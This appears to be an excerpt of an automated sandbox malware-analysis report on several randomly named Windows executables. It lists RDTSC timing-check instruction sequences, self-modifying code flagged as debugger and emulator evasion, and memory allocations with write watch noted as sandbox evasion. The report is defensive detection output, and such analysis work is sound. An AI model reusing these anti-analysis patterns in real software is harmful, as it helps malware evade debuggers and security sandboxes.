Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE967 second address: ECE999 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C24FD04ECh 0x00000008 jmp 00007F8C24FD04D7h 0x0000000d jmp 00007F8C24FD04CFh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE999 second address: ECE99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE99F second address: ECE9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECEC2B second address: ECEC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECEC31 second address: ECEC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECEC35 second address: ECEC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECFDB5 second address: ECFDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED3E40 second address: ED3E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F396h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8D0E second address: ED8D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8692 second address: ED86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F396h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F8C2504F386h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F8C2504F386h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8832 second address: ED8837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89A1 second address: ED89A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89A7 second address: ED89C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C24FD04D6h 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89C4 second address: ED89C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89C8 second address: ED89D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8C24FD04C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89D4 second address: ED89E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8C2504F386h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89E0 second address: ED89E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89E6 second address: ED8A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F8C2504F397h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F8C2504F38Dh 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8A1E second address: ED8A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C24FD04CCh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8C24FD04D3h 0x00000011 popad 0x00000012 js 00007F8C24FD04CEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64D1 second address: EE64D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64D5 second address: EE64DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64DB second address: EE64E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64E7 second address: EE653F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C24FD04CAh 0x00000008 jc 00007F8C24FD04F5h 0x0000000e jmp 00007F8C24FD04D9h 0x00000013 jmp 00007F8C24FD04D6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007F8C24FD04CAh 0x00000022 pushad 0x00000023 jnp 00007F8C24FD04C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE653F second address: EE654C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F8C2504F386h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE619C second address: EE61A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61A2 second address: EE61CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C2504F38Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61CE second address: EE61D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61D2 second address: EE61D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61D6 second address: EE61DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61DC second address: EE61E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61E3 second address: EE61EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61EC second address: EE61F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89C6 second address: EE89D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89D1 second address: EE89D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89D7 second address: EE89E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89E2 second address: EE89E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89E8 second address: EE89EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF47A second address: EEF486 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF486 second address: EEF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04CDh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F8C24FD04D8h 0x00000010 jmp 00007F8C24FD04CBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF4BE second address: EEF4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF4C3 second address: EEF4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFF5B2 second address: EFF5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFF6F4 second address: EFF6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFF6FA second address: EFF6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFFA28 second address: EFFA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F005B2 second address: F005D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F8C2504F386h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F0504D second address: F05051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F04D46 second address: F04D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8C2504F386h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F0D9BC second address: F0D9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F1307E second address: F1309B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F397h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F229A2 second address: F229B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F8C24FD04C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F229B6 second address: F229BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F313C9 second address: F313E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04D8h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31588 second address: F3159F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8C2504F390h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3171B second address: F31741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F8C24FD04CEh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31741 second address: F31745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A6B second address: F31A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A71 second address: F31A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A7D second address: F31A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A81 second address: F31A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A87 second address: F31A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C24FD04D1h 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31CFD second address: F31D06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31D06 second address: F31D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jc 00007F8C24FD04C6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31D1B second address: F31D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C2504F386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31E4D second address: F31E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31E51 second address: F31E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31E59 second address: F31E5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31FA8 second address: F31FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3655F second address: F3656D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3656D second address: F36581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F365EB second address: F36602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C24FD04D3h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F367E6 second address: F367EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F368D3 second address: F368E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F368E8 second address: F3693A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F8C2504F390h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnl 00007F8C2504F399h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jns 00007F8C2504F38Eh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F8C2504F388h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3693A second address: F3693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F37E85 second address: F37EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Ah 0x00000007 jl 00007F8C2504F397h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8C2504F38Fh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8C2504F393h 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F37EBF second address: F37ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C24FD04CCh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: 53203E1 second address: 53203F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: 532049F second address: 53204AA instructions: 0x00000000 rdtsc 0x00000002 mov dx, 099Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: 53204AA second address: 53204F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov bx, E750h 0x0000000c push ebx 0x0000000d mov dx, ax 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push edi 0x00000016 pushfd 0x00000017 jmp 00007F8C2504F398h 0x0000001c sbb eax, 698F22C8h 0x00000022 jmp 00007F8C2504F38Bh 0x00000027 popfd 0x00000028 pop eax 0x00000029 push eax 0x0000002a push edx 0x0000002b mov dx, 886Ah 0x0000002f rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: CA3C68 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: CA3D34 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: E5EBEB instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: EDEA13 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: 1850000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: 3260000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: 1900000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory allocated: 1130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory allocated: 2D70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory allocated: 1130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Memory allocated: 1150000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Memory allocated: 2E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Memory allocated: 12D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Memory allocated: 1770000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Memory allocated: 3210000 memory reserve | memory write watch Jump to behavior
